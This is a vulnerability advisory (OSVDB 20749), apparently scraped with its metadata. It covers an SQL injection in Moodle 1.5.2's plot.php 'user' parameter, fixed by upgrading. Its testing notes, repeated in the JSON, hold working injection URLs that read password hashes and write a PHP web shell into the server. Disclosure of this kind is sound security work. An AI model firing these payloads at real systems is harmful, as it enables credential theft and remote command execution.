ID OSVDB:20749 Type osvdb Reporter rgod(retrogod@aliceposta.it) Modified 2005-11-10T07:03:44
Description
Vulnerability Description
Moodle contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the plot.php script not properly sanitizing user-supplied input to the "user" variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.
Solution Description
Upgrade to version 1.6dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
Moodle contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the plot.php script not properly sanitizing user-supplied input to the "user" variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.
Manual Testing Notes
to view user/admin password hashes:
http://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0.0.1&user='or%20isnull(1/0)/*
to inject a shell:
http://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0.0.1&user='UNION
%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
'<?php%20system($_GET[cmd]);%20?>%20',0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../
../www/moodle/shell.php'%20FROM%20mdl_user/*
{"type": "osvdb", "published": "2005-11-10T07:03:44", "href": "https://vulners.com/osvdb/OSVDB:20749", "hashmap": [{"key": "affectedSoftware", "hash": "2993f8398daadf87c8c21d5afa1e996e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "a388af343106b99defbc3ee738809a98"}, {"key": "href", "hash": "6e6165121227914ef59738ead1e0a763"}, {"key": "modified", "hash": "a0c1466a81ec19c5659bb1384ccb3802"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a0c1466a81ec19c5659bb1384ccb3802"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "17939f0b37aa78ee6023c3f7a9f156d5"}, {"key": "title", "hash": "c62f7dbb9e92e529449fd3d6bc76d8e0"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "NONE", "score": 0.0}, "viewCount": 1, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "rgod(retrogod@aliceposta.it)", "title": "Moodle plot.php user Variable SQL Injection", "affectedSoftware": [{"operator": "eq", "version": "1.5.2", "name": "Moodle"}], "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2017-04-28T13:20:17"}, "dependencies": {"references": [], "modified": "2017-04-28T13:20:17"}, "vulnersScore": 0.5}, "references": [], "id": "OSVDB:20749", "hash": "475bf67afe51d1570e5f6d2f97f24dc74c41d5e1f53d0ca8580ab03a9d83e81c", "lastseen": "2017-04-28T13:20:17", "cvelist": [], "modified": "2005-11-10T07:03:44", "description": "## Vulnerability Description\nMoodle contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the plot.php script not properly sanitizing user-supplied input to the \"user\" variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 1.6dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMoodle contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the plot.php script not properly sanitizing user-supplied input to the \"user\" variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nto view user/admin password hashes:\nhttp://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0.0.1&user='or%20isnull(1/0)/*\n\nto inject a shell:\nhttp://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0.0.1&user='UNION\n%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n'<?php%20system($_GET[cmd]);%20?>%20',0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../\n../www/moodle/shell.php'%20FROM%20mdl_user/*\n## References:\nVendor URL: http://moodle.org/\nSecurity Tracker: 1015181\n[Secunia Advisory ID:17526](https://secuniaresearch.flexerasoftware.com/advisories/17526/)\n[Related OSVDB ID: 20748](https://vulners.com/osvdb/OSVDB:20748)\n[Related OSVDB ID: 20750](https://vulners.com/osvdb/OSVDB:20750)\nOther Advisory URL: http://rgod.altervista.org/moodle16dev.html\nGeneric Exploit URL: http://www.milw0rm.com/id.php?id=1312\n"}